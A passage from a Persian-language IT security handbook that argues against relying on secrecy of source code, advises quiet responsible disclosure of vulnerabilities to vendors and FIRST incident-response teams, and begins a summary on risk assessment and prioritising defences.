ﻣﺪﻳﺮﻳﺖ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺷـﻨﺎﺧﺖ ﻭ ﻣﺒـﺎﺭﺯﻩ ﺑـﺎ ﻣـﺸﻜﻞ ﺭﺍ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻭ ﺍﮔﺮ ﻣﺴﺌﻠﻪﺍﻱ ﺑﺮﺍﻱ ﻳﻚ ﻳﺎ ﺩﻭ ﻧﻔـﺮ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ
ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺳﻨﺎﺩ ﺑﻮﺩﻩﺍﻧﺪ ﺭﺥ ﺩﻫﺪ ،ﺩﻳﮕﺮ ﻛﺴﻲ ﺑـﺎ
ﺗﺠﺮﺑــﻪ ﻳــﺎ ﺍﻃﻼﻋــﺎﺕ ﻻﺯﻡ ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ﻛــﻪ ﺩﺭ ﻣﻮﺍﻗــﻊ ﺑــﺮﻭﺯ
ﻣﺸﻜﻼﺕ ﻫﻤﻴﺎﺭﻱ ﻛﻨﺪ.
١٥٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻧﻴﺰ ﻫﻴﭻ ﺗـﻀﻤﻴﻨﻲ ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ
ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ .ﻛﺴﺎﻧﻴﻜﻪ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ
ﻭﺍﺭﺩ ﺷﻮﻧﺪ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨﻨـﺪ؛
ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻳﺎ ﻧﺪﺍﺷﺘﻪ
ﺑﺎﺷﻨﺪ ٨٧.ﺍﻣﺎ ﺑﺪﻭﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ،ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ
ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻣﺪﻭﻥ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﺗﺎ ﻣـﺸﻜﻼﺕ ﺁﻧـﺮﺍ ﺑﻴﺎﺑﻨـﺪ؛ ﻭ ﻟـﺬﺍ
ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﺰﻳـﺖ
ﻛﻮﭼﻜﻲ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ،ﺍﻣﺎ ﺍﻣﻨﻴـﺖ ﻧﺒﺎﻳـﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﺨﻔـﻲﺑـﻮﺩﻥ
ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻧﮕﺮﺵ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻳـﻚ ﻧﻜﺘـﺔ ﻛﻠﻴـﺪﻱ ﺍﺳـﺖ .ﺩﺭﺻـﻮﺭﺕ
ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺍﻗﺪﺍﻣﺎﺕ ﺩﻓـﺎﻋﻲ ﻛـﻪ ﺑـﺮ
ﻣﺒﻨﺎﻱ ﻣﺨﻔﻲﻛﺎﺭﻱ ﺍﺳـﺘﻮﺍﺭﻧﺪ ﻫﻤﮕـﻲ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ
ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ .ﺣﺘﻲ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺗـﺪﺍﻭﻡ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺎﻋـﺚ
ﺟﻠﻮﮔﻴﺮﻱ ﻳﺎ ﻣﺤﺪﻭﺩ ﺷﺪﻥ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺷـﻮﺩ
ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮﮔﺰ ﻧﺘﻮﺍﻥ ﻓﻬﻤﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﺍﻳـﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ
ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ .ﺑﻮﺳﻴﻠﺔ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ
ﻛﻪ ﺫﺍﺗﹰﺎ ﻣﺴﺘﺤﻜﻢ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩ،
ﺣﺘﻲ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﻛـﻪ
ﺷﻤﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺴﺘﺤﻜﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻛـﻪ ﻫﻤـﻪ ﺍﺯ
ﺁﻥ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬـﺎﺟﻢ ﺭﺍ ﻧﺎﺍﻣﻴـﺪ ﻛﻨـﺪ ﻭ ﺑﺎﻋـﺚ
ﺷﻮﺩ ﺟﺎﻱ ﺩﻳﮕﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺷـﻤﺎ ﺑـﺪﻧﺒﺎﻝ ﻫﻴﺠـﺎﻥ
ﻧﺎﺷﻲ ﺍﺯ ﻧﻔﻮﺫ ﺑﺎﺷﺪ .ﺍﮔﺮ ﭘﻮﻟﻬﺎﻳﺘﺎﻥ ﺭﺍ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﻱ ﻗﻔـﻞﺩﺍﺭ
ﭘﻨﻬﺎﻥ ﻛﻨﻴﺪ ﺍﻣﻨﻴﺖ ﺁﻥ ﺑﻴﺸﺘﺮ ﺍﺯ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻛﺴﻲ ﻧﺪﺍﻧـﺪ ﺍﺯ
ﭘﻮﻟﻬﺎﻳﺘﺎﻥ ﺩﺭ ﻳﻚ ﻗﻮﻃﻲ ﺳﺲ ﻣـﺎﻳﻮﻧﺰ ﺩﺭ ﻳﺨﭽـﺎﻝ ﻧﮕﻬـﺪﺍﺭﻱ
ﻣﻲﻛﻨﻴﺪ!
ﺍﻓﺸﺎﻱ ﻣﺴﺌﻮﻻﻧﻪ
ﻣﻘﺼﻮﺩ ﺍﺯ ﺍﻳﺮﺍﺩﻱ ﻛﻪ ﺑﻪ "ﺍﻣﻨﻴﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺟﻬـﻞ ﻣﻬـﺎﺟﻢ" ﻭﺍﺭﺩ
ﺷﺪ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﮕﻮﻳﻴﻢ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺣﻔـﺮﻩﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻳـﺪ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ ﮔـﺴﺘﺮﺩﻩ ﺑـﻪ ﺍﻃـﻼﻉ ﻋﻤـﻮﻡ
ﺑﺮﺳﺎﻧﻴﺪ .ﻣﻴﺎﻥ ﻣﺨﻔﻲﻛﺎﺭﻱ ﻭ ﺍﺣﺘﻴﺎﻁ ﺗﻔﺎﻭﺗﻬـﺎﻱ ﻋﻤـﺪﻩ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ .ﺍﮔﺮ ﺩﺭ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻮﺯﻳﻊﺷﺪﻩ ﻳﺎ ﭘﺮﻣﺼﺮﻑ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘـﻲ
ﻛﺸﻒ ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﺳﺮ ﻭ ﺻﺪﺍ ﻭ ﻫﺮﭼـﻪ ﺳـﺮﻳﻌﺘﺮ ﺁﻧـﺮﺍ ﺑـﻪ
۸۷
ﺗﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺷﻤﺎ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍ ﺑﻮﺳـﻴﻠﺔ ﺧـﻮﺩ ﻭ ﺩﺭ
ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺩﺗﺎﻥ ﺗﻮﺳﻌﻪ ﻧﺪﻫﻴﺪ ،ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻔﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ
ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﻭ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ
ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺗﺼﺎﺩﻓﹰﺎ ﻳﺎ ﺗﻌﻤﺪﹰﺍ ﺍﻓﺸﺎ ﺷﻮﺩ.
ﺗﻮﺳﻌﻪﺩﻫﻨـﺪﺓ ﺁﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻃـﻼﻉ ﺩﻫﻴـﺪ .ﻫﻤﭽﻨـﻴﻦ ﺗﻮﺻـﻴﻪ
ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺁﻧﺮﺍ ﺑﻪ ﺍﻃﻼﻉ ﻳﻜﻲ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ) FIRSTﻛـﻪ ﺩﺭ
ﺿﻤﻴﻤﺔ ۴ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ( ﻧﻴﺰ ﺑﺮﺳﺎﻧﻴﺪ .ﺍﻳﻦ ﻣﺆﺳﺴﺎﺕ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻛﻤﻚ ﻛﻨﻨﺪ ﺗﺎ ﺑـﺮﺍﻱ ﺣﻔـﺮﻩﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﻛﺸﻒﺷﺪﻩ ﻭﺻﻠﻪﻫﺎﻳﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﻛـﻪ
ﻭﺻﻠﻪﻫـﺎ ﺗﻮﺯﻳـﻊ ﺷـﺪﻩ ﻭ ﺑﻄـﻮﺭ ﺻـﺤﻴﺢ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﮔﺮﻓﺘﻪﺍﻧﺪ.
ﺍﮔﺮ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺩﺭ ﺑـﻮﻕ ﻭ ﻛﺮﻧـﺎ ﻛﻨﻴـﺪ ،ﺗﻤـﺎﻡ
ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﺁﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ
ﺍﺷﻜﺎﻻﺕ ﺁﻧﺮﺍ ﺭﻓﻊ ﻛﻨﻨـﺪ ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ ﻛـﺮﺩﻩﺍﻳـﺪ .ﺩﺭ ﻣﺤـﻴﻂ
Unixﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺻـﻼﺡ
ﺍﺷﻜﺎﻻﺕ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ،ﺩﺭ ﻣﺘﻦ ﺁﻥ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻛﻨﻨﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻪ ﺍﺯ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴـﺴﺘﻨﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺑﺎﻳﺪ ﻫﻔﺘﻪﻫﺎ ﻳﺎ ﻣﺎﻫﻬﺎ ﺻﺒﺮ ﻛﻨﻨﺪ ﺗـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﻩ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﺓ ﻣﺮﺑﻮﻃﻪ ﻣﻨﺘﺸﺮ ﺷـﻮﺩ .ﺑﻌـﻀﻲ
ﺍﺩﺍﺭﺍﺕ ﻣﻤﻜﻦ ﺍﺳﺖ -ﺑﺪﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺟﺰ ﺭﻭﺷﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﻭ
ﻛﺎﺭ ﺑﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻛﺎﺭ ﺩﻳﮕﺮﻱ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻧﻤـﻲﻛﻨﻨـﺪ ﻭ ﻳـﺎ
ﻧﺮﻡﺍﻓﺰﺍﺭﺷﺎﻥ ﺑﺮ ﺍﺳﺎﺱ ﺗﻨﻈﻴﻤﺎﺕ ﻣﻮﺟﻮﺩ ﮔﻮﺍﻫﻲ ﺩﺭﻳﺎﻓﺖ ﻛـﺮﺩﻩ
ﻭ ﻟﺬﺍ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻧﺮﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻨـﺪ -ﺣﺘـﻲ ﻗـﺎﺩﺭ ﺑـﻪ
ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﻫﻢ ﻧﺒﺎﺷﻨﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ
ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺭﺍﻫﺒﺮﻱ ﺷﻮﻧﺪ ﻛـﻪ ﻣﻬـﺎﺭﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺍﻋﻤـﺎﻝ
ﻭﺻﻠﻪﻫﺎ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﻭ ﺍﺯ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻫﻢ ﺍﺳﺘﻔﺎﺩﺓ ﻓﻌﺎﻝ
ﻧﺸﻮﺩ ﻭ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﺣﻴﻄﺔ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﺷـﻨﺪ .ﻫﻤﻴـﺸﻪ
ﻣﺴﺌﻮﻻﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ .ﺑﻬﺘﺮ ﺍﺳﺖ ﻳﻚ ﻭﺻﻠﻪ ﺭﺍ ﺑﺪﻭﻥ ﺗﻮﺿﻴﺢ ﺩﺭ
ﻣﻮﺭﺩ ﺯﻳﺮﺑﻨﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺮﺑﻮﻃﻪ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ ﺗﻮﺯﻳﻊ ﻛﻨﻴﻢ،
ﺗﺎ ﺍﻳﻨﻜﻪ ﺑﺨﻮﺍﻫﻴﻢ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺟﺰﺋﻴﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﻭﺷﻬﺎﻱ ﻧﻔﻮﺫ
ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻭﺻﻠﻪﻧﺸﺪﻩ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﻴﻢ.
ﻣﺎ ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩﻱ ﺩﻳﺪﻩ ﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻓـﺮﺩﻱ ﻣﺘﺨـﺼﺺ ﻳـﻚ
ﺍﺷﻜﺎﻝ ﻣﻬﻢ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﻳﻚ ﮔﺮﻭﻩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺴﻴﺎﺭ
ﻋﻤﻮﻣﻲ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺍﮔﺮﭼﻪ ﻫﺪﻑ ﺍﻳﻦ ﺷﺨﺺ ﺩﺭﻳﺎﻓﺖ
ﻳﻚ ﺍﺻﻼﺡ ﺳﺮﻳﻊ ﺍﺯ ﺟﺎﻧﺐ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﻮﺩﻩ ،ﻭﻟﻲ ﻧﺘﻴﺠـﺔ ﻛـﺎﺭ
ﻣﻮﺟﻲ ﺍﺯ ﺗﻬﺎﺟﻤﺎﺕ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺷﺪﻩ ﻛﻪ ﺭﺍﻫﺒـﺮﺍﻥ ﺁﻧﻬـﺎ ﺑـﻪ
ﻣﻄﺎﻟﺐ ﺁﻥ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺷﺘﻪ ﻭ ﻳﺎ ﻗـﺎﺩﺭ ﺑـﻪ ﺍﻋﻤـﺎﻝ
ﺍﺻﻼﺡ ﺍﺭﺍﺋﻪﺷﺪﻩ ﻧﺒﻮﺩﻩﺍﻧﺪ.
ﺍﮔﺮ ﻫﻨﻮﺯ ﻭﺻﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﺧﻴـﺮ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ
ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺍﺭﺳﺎﻝ ﺟﺰﺋﻴﺎﺕ ﺁﻧﻬﺎ ﺑﻪ ﻳـﻚ ﮔـﺮﻭﻩ ﭘـﺴﺘﻲ
ﻧﻪﺗﻨﻬﺎ ﺑﺴﻴﺎﺭﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﻩ ﺧﻮﺍﻫﺪ ﺍﻧﺪﺍﺧﺖ،
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﻠﻜﻪ ﺍﮔﺮ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺍﺯ ﺁﻥ ﺍﺷﻜﺎﻝ ﺑـﺮﺍﻱ ﻧﻔـﻮﺫ ﺑـﻪ ﺳـﺎﻳﺘﻬﺎﻱ
ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ
ﻋﻠﻴﻪ ﺷﻤﺎ ﻧﻴﺰ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺎﻧﻮﻧﻲ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ٨٨.ﺍﮔﺮ ﺷﻤﺎ ﻧﮕـﺮﺍﻥ
ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﻫﺴﺘﻴﺪ ﻣﺘﻮﺟـﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺟﺰﺋـﻲ ﺍﺯ ﻳـﻚ ﺟﺎﻣﻌـﻪ
ﻣﻲﺑﺎﺷﻴﺪ .ﺩﺭ ﺟﺎﻣﻌﻪ ﺑﺎﻳﺪ ﺑﺪﻧﺒﺎﻝ ﺗﻘﻮﻳﺖ ﺍﻣﻨﻴﺖ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺑـﻮﺩ
ﻭ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﺯﻱ ﻫﻢ ﻣﺎ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ
ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻴﻢ.
ﺟﻤﻊﺑﻨﺪﻱ ﺑﺤﺚ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ
ﻛﻠﻴﺪ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺓ ﻣﻮﻓﻖ ،ﺗﺸﺨﻴﺺ ﻫﻤﺔ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻤﻜـﻦ
ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﻭ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺗﻲ ﺍﺳﺖ ﻛـﻪ ﺍﺯ ﻧﻈـﺮ ﺷـﻤﺎ
ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﻧﺪ.
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ ﺍﻭﻟﻮﻳﺘﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻗﺒـﻞ
۸۸
ﻫﺮﭼﻨﺪ ﻣﺎ ﻫﻨﻮﺯ ﻭﻗﻮﻉ ﭼﻨﻴﻦ ﻣﻮﺭﺩﻱ ﺭﺍ ﻧﺪﻳﺪﻩﺍﻳﻢ ،ﺍﻣﺎ ﻭﻛﻴﻼﻥ ﻣﺘﻌﺪﺩﻱ
ﺑﻪ ﻣﺎ ﮔﻔﺘﻪﺍﻧﺪ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻧﺪ ﻣﻮﻛﻼﻧﺸﺎﻥ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺭﺍ ﺍﺯ
ﺁﻧﻬﺎ ﺑﺨﻮﺍﻫﻨﺪ.
ﻼ ﻓﻜﺮ ﻛﺮﺩﻩﺍﻳﺪ ﺑﻪ ﺳﺮﺍﻍ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺮﻭﻳـﺪ؛
ﺭﻭﻱ ﺁﻧﻬﺎ ﻛﺎﻣ ﹰ
ﭼﺮﺍﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻤـﺎﻡ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﻤﻜـﻦ ،ﺣﻔﺎﻇـﺖ
ﺑﻮﺟﻮﺩ ﺁﻭﺭﻳﺪ .ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﺑﺠـﺎﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﻳـﻚ
ﻣﺸﻜﻞ ﺑﺎﻳﺪ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺁﻥ ﻣﺸﻜﻞ ﺭﺥ ﺩﻫﺪ ﻭ ﺳـﭙﺲ ﺑـﻪ ﺭﻓـﻊ
ﺁﺛﺎﺭ ﺁﻥ ﺍﻗﺪﺍﻡ ﻛﻨﻴﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻳﻚ ﻗﻄﻌـﻲ ﺑـﺮﻕ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﻃﻮﺭﻱ ﺑﺎﺷﺪ ﻛـﻪ ﺍﮔـﺮ ﺑﮕﺬﺍﺭﻳـﺪ ﺳﻴـﺴﺘﻤﻬﺎ
ﺧﺎﻣﻮﺵ ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻣﺠـﺪﺩ ﺷـﻮﻧﺪ ﺑﺮﺍﻳﺘـﺎﻥ ﺑـﺴﻴﺎﺭ ﺍﺭﺯﺍﻧﺘـﺮ ﺍﺯ
ﺧﺮﻳﺪﺍﺭﻱ ﻳﻚ ﺳﻴﺴﺘﻢ UPSﺗﻤﺎﻡ ﺷﻮﺩ.
ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷـﻤﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺩﻓـﺎﻉ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺍﻳﺪﺓ ﺧﺎﺻﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ )ﻣﺜﻞ ﺗﻬـﺎﺟﻢ ﻳـﻚ ﺑﻴﮕﺎﻧـﻪ ﺍﺯ
ﻓﻀﺎ(؛ ﻳﺎ ﺑﻪ ﺁﻥ ﺳﺒﺐ ﻛﻪ ﺑﺴﻴﺎﺭ ﻏﻴﺮ ﻣﺤﺘﻤـﻞ ﻫـﺴﺘﻨﺪ ،ﺩﻓـﺎﻉ ﺩﺭ
ﻣﻘﺎﺑﻠﺸﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺑﺎﺷﺪ )ﻣﺜﻞ ﻭﻗـﻮﻉ ﻳـﻚ ﺍﻧﻔﺠـﺎﺭ ﻫـﺴﺘﻪﺍﻱ ﺩﺭ
۲۰۰ﻣﺘﺮﻱ ﻣﺮﻛﺰ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ( ﻳﺎ ﺑﺴﻴﺎﺭ ﻓﺎﺟﻌﻪﺁﻣﻴﺰﺗﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷـﻨﺪ
